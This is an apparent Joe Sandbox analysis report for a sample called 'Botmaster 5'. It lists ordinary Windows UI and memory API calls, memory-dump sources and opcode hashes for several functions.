                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                  • Opcode ID: bfcc5128aa88a50ee4ef1e994bf8e391b5b32155225f85703b4190bf3d4ab926
                                                                                                                                                                                                                  • Instruction ID: 50b6e09cc81f11ac04766bb8cae28b6c67a1cc31c0c9b3a77187fbee224d1a93
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfcc5128aa88a50ee4ef1e994bf8e391b5b32155225f85703b4190bf3d4ab926
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D20161B5A00219BFEF019F54DC80EDABBB8FF48354F104116F61566290D7B59D20CFA4
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040D1CC Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • ShowCursor.USER32(00000001,?,00404851,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000,00000000,00000000), ref: 0040D238
                                                                                                                                                                                                                  • DestroyWindow.USER32(?,00404851,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000,00000000,00000000,00000000), ref: 0040D252
                                                                                                                                                                                                                  • InvalidateRect.USER32(00000000,00000001,?,00404851,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000,00000000), ref: 0040D267
                                                                                                                                                                                                                  • timeEndPeriod.WINMM(00000001,?,00404851,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000,00000000,00000000), ref: 0040D271
                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,00404851,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4,0046AFD0,00000000,00000000,00000000), ref: 0040D27E
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ShowWindow$CursorDestroyInvalidatePeriodRecttime
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1229069409-0
                                                                                                                                                                                                                  • Opcode ID: a8001882bc57a45f1c84b92086b8bebf391c9806ac2675525150d3bdb19ee770
                                                                                                                                                                                                                  • Instruction ID: c17ce54fcdcb1b5ededf534a123212e50bebd6a3bc73991ed81c5552eb549176
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8001882bc57a45f1c84b92086b8bebf391c9806ac2675525150d3bdb19ee770
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9119D30A012249BC7119FA1EC489997B69FB09B45B04407BF505D62B5EBF648C6CFDE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00425554 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$Focus$EnabledLongVisible
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1625685152-0
                                                                                                                                                                                                                  • Opcode ID: 6d42d6562ff0a42f518e430d22f1531f8af618bf82920e3f77caa9e92745be38
                                                                                                                                                                                                                  • Instruction ID: e6e40902c19b31863be0fdc070f3bb637103f32545dc95abbbb0424e04664137
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d42d6562ff0a42f518e430d22f1531f8af618bf82920e3f77caa9e92745be38
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80F08C30305611AFD3218F14ACCCB2BB3ADAF85B55B94403EF442D1258D7B8DCC1D62A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041FD52 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetObjectType.GDI32(?), ref: 0041FD66
                                                                                                                                                                                                                  • GetWindowRect.USER32(?,00000000), ref: 0041FD84
                                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 0041FD95
                                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 0041FD9C
                                                                                                                                                                                                                  • RedrawWindow.USER32(00000000,00000105,00000000,00000105), ref: 0041FDAA
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ClientScreenWindow$ObjectRectRedrawType
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3513018324-0
                                                                                                                                                                                                                  • Opcode ID: 0fea956cf27a6595bf37bbfb1d6f254d2ffe0c37674ef667c95804497c8a2d76
                                                                                                                                                                                                                  • Instruction ID: 6bb61c72f4d4f34ff6eb0d3800f432caf166f7b2722a073d6bf4b2dfc0c58aab
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fea956cf27a6595bf37bbfb1d6f254d2ffe0c37674ef667c95804497c8a2d76
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF03C72500118AEDB159B64EC48EFF3B7DFB81705F04012AF90296150EBB4AD45CBA5
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00420202 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0042022D
                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0042023B
                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00420243
                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00420247
                                                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00420259
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Color$BrushText
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3324192670-0
                                                                                                                                                                                                                  • Opcode ID: d981ffac8591667c12147808a5896ac526d977e2874fccd62649a406ba9e66a4
                                                                                                                                                                                                                  • Instruction ID: 893a6dbaefd6eb6ece53178a96325428e3062efbf3af6a8a44fb4049764dc528
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d981ffac8591667c12147808a5896ac526d977e2874fccd62649a406ba9e66a4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45F04471200714ABD2209F29AC88967B3EDAB94731F400B27F579D36D2D7B4BC458A75
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042057E Relevance: 7.5, APIs: 5, Instructions: 37windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00420588
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,000000FF,00000000), ref: 004205A7
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,?), ref: 004205BF
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004205D0
                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 004205DA
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend$Window$LongText
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1836560844-0
                                                                                                                                                                                                                  • Opcode ID: 16fa6bc495a92c2d8a0fb7ac337bea529d57bffbd02a0b0c2a6dc546153cdee2
                                                                                                                                                                                                                  • Instruction ID: 318dae897260d89daa081d1a991ab86861a708d717c4fc677a13c5e6e0654c6a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16fa6bc495a92c2d8a0fb7ac337bea529d57bffbd02a0b0c2a6dc546153cdee2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47F04F35248151FBEA119F04EC04F5A77E5BF81770F200625F1A0651F4D7B16C91DF09
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00421D5D Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 00423A92: GetWindowRect.USER32(?,?), ref: 00423ABF
                                                                                                                                                                                                                    • Part of subcall function 00423A92: GetParent.USER32(?), ref: 00423ACD
                                                                                                                                                                                                                    • Part of subcall function 00423A92: MapWindowPoints.USER32(00000000,00000000), ref: 00423AD6
                                                                                                                                                                                                                    • Part of subcall function 00423A92: MoveWindow.USER32(?,?,?,?,00000001,00000001), ref: 00423B56
                                                                                                                                                                                                                    • Part of subcall function 00423A92: RedrawWindow.USER32(?,00000000,00000000,00000007), ref: 00423B6E
                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00421D80
                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00421D94
                                                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000), ref: 00421D99
                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00421DA7
                                                                                                                                                                                                                  • InvalidateRect.USER32(00000000), ref: 00421DAA
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$ParentRect$Points$InvalidateMoveRedraw
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 310311730-0
                                                                                                                                                                                                                  • Opcode ID: 8e1663ed7f31d18e2dac1598c907ff9f317065206eaa3cefad9bab81ca71f2ef
                                                                                                                                                                                                                  • Instruction ID: 55ffe65f2f59a14a8865b958c4112f637054378e6503c6b58e897947977cc186
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e1663ed7f31d18e2dac1598c907ff9f317065206eaa3cefad9bab81ca71f2ef
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F0F936500119BFDF01AF90EC09EEF7B7DFB48741F004425FA4192061D7B2A921DBA5
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041DD1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ColorMode$TextWindow
                                                                                                                                                                                                                  • String ID: SysListView32
                                                                                                                                                                                                                  • API String ID: 4082474495-78025650
                                                                                                                                                                                                                  • Opcode ID: f16309ccba5e209ddff298f446ec5e9e2d75c921199e556e06d48712443be6d5
                                                                                                                                                                                                                  • Instruction ID: c8fe4a695942b32b48eaf1af426377292c94a9faaa77a359086a62ae2cb9c0c3
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f16309ccba5e209ddff298f446ec5e9e2d75c921199e556e06d48712443be6d5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE519DB5A04744AFC720AF10E8C17DA73A1FB18304F44442AEA954A362D7399DD1CB5A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00421331 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000443,00000000,?), ref: 0042135A
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000444,00000004,0000005C), ref: 004213A6
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000444,00000000,0000005C), ref: 004213B1
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                  • String ID: \
                                                                                                                                                                                                                  • API String ID: 3850602802-2967466578
                                                                                                                                                                                                                  • Opcode ID: 1866ca4cbf73e2a619946fbdebfb03b1f32ef141406d2c5cf4c8c4e67509c266
                                                                                                                                                                                                                  • Instruction ID: 8bda951224b15161bf3062a4017d3ec7ace65db03678bee1846f0d091d728703
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1866ca4cbf73e2a619946fbdebfb03b1f32ef141406d2c5cf4c8c4e67509c266
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19119472A00248EFEF20CF84DC40B9E77BAEB50764F208126FA116B6D4D2756D05CF55
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042AAE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: __p__iobexitfprintf
                                                                                                                                                                                                                  • String ID: %s
                                                                                                                                                                                                                  • API String ID: 93289866-620797490
                                                                                                                                                                                                                  • Opcode ID: f26b437e818cdc3cd9299f52384d19fe132a5ac22f10d7e830751aca1071a310
                                                                                                                                                                                                                  • Instruction ID: fc8eb19485229033a0735bbdba3992930087437814726c874b2f6728bd945088
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f26b437e818cdc3cd9299f52384d19fe132a5ac22f10d7e830751aca1071a310
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDF0A7745011009FD304EB58EC49EAA73A8EF48300F04485CF545C3395EBF9AD19CBAB
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004228EC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetPropW.USER32(?,PB_3State), ref: 00422907
                                                                                                                                                                                                                  • RemovePropW.USER32(?,PB_3State), ref: 00422914
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00422925
                                                                                                                                                                                                                    • Part of subcall function 004236A6: ImageList_Destroy.COMCTL32(?,?,?,00420712,?), ref: 004236B4
                                                                                                                                                                                                                    • Part of subcall function 004236A6: ImageList_Destroy.COMCTL32(?,?,?,00420712,?), ref: 004236BE
                                                                                                                                                                                                                    • Part of subcall function 004236A6: HeapFree.KERNEL32(00000000,?,?,?,00420712,?), ref: 004236D1
                                                                                                                                                                                                                    • Part of subcall function 004236A6: HeapFree.KERNEL32(00000000,?,?,?,00420712,?), ref: 004236DC
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FreeHeap$DestroyImageList_Prop$Remove
                                                                                                                                                                                                                  • String ID: PB_3State
                                                                                                                                                                                                                  • API String ID: 3966052949-216037111
                                                                                                                                                                                                                  • Opcode ID: 99c0072853683b98098ef0fcb7270d201d1590916b86534ce522fff8972bd19c
                                                                                                                                                                                                                  • Instruction ID: a477b27f9cda69f8bea958cc53403394a546b471a1da02cb7f1888223328a5e6
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99c0072853683b98098ef0fcb7270d201d1590916b86534ce522fff8972bd19c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36E0ED35300210BBDA215F25FC08E077BB9FB95B11B55843AF581A2164D7B59C14DB2A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040ECC3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(DINPUT.DLL), ref: 0040ECD0
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DirectInputCreateEx), ref: 0040ECE5
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
